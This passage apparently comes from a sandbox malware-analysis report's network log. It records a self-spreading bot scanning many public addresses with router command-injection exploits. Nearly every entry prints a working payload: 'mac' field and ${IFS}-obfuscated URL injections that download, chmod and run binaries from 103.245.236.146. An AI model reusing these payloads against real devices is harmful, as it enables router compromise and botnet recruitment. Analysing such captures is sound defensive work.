                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:41.294585943 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:42.734359026 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1395192.168.2.143691860.190.220.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173665047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1396192.168.2.144528886.72.235.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173752069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1397192.168.2.1453294193.110.70.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173784018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1398192.168.2.143680819.157.106.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173809052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1399192.168.2.1457192216.186.15.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173830986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1400192.168.2.1445492177.171.186.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173880100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1401192.168.2.1435558132.27.67.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173933983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1402192.168.2.145288027.246.138.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.173960924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1403192.168.2.144468464.46.237.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174002886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1404192.168.2.1439734151.53.12.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174045086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1405192.168.2.144572045.186.117.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174088955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1406192.168.2.1446968102.104.93.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174127102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1407192.168.2.1438938121.81.82.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174158096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1408192.168.2.144202643.225.34.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174206972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1409192.168.2.144557693.248.47.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174251080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1410192.168.2.145103684.233.16.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174300909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1411192.168.2.145179887.216.244.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174326897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1412192.168.2.145360292.233.17.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174375057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1413192.168.2.1437866163.31.51.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174408913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1414192.168.2.1433234190.254.7.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174453020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1415192.168.2.143795662.191.144.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174523115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1416192.168.2.1445622194.210.74.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174561977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1417192.168.2.143648251.81.254.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174611092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1418192.168.2.1440056177.59.173.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174638033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1419192.168.2.144708448.111.178.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174674988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1420192.168.2.1438942206.24.244.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174738884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1421192.168.2.1450480110.6.41.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174766064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1422192.168.2.145677871.130.101.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174799919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1423192.168.2.143479638.44.233.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174843073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1424192.168.2.1452064178.64.95.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174865007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1425192.168.2.1441084116.39.134.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174887896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1426192.168.2.1442560207.143.41.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174942970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1427192.168.2.143363246.102.129.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.174966097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1428192.168.2.1450192134.137.89.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175012112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1429192.168.2.1450840135.219.123.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175041914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1430192.168.2.144044665.80.148.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175065041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1431192.168.2.1460940107.24.242.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175117016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1432192.168.2.1449720206.198.101.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175143957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1433192.168.2.1454710166.253.131.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175173998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1434192.168.2.145623264.73.156.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175230980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1435192.168.2.1439594156.108.163.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175266027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1436192.168.2.143553058.68.218.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175318956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1437192.168.2.1434638134.87.234.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175347090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1438192.168.2.1440034122.125.102.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175378084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1439192.168.2.145093243.146.210.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175421000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1440192.168.2.1448026150.184.49.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175462008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1441192.168.2.145364281.82.133.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175487041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1442192.168.2.145886635.143.176.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175554991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1443192.168.2.14369709.130.167.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175587893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1444192.168.2.144692877.32.8.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175614119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1445192.168.2.1436966182.60.76.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175645113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1446192.168.2.144776249.31.230.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175693989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1447192.168.2.1459490204.186.123.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175714016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1448192.168.2.1439618125.199.104.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.175754070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1449192.168.2.143893469.186.142.109443
                                                        TimestampBytes transferredDirectionData
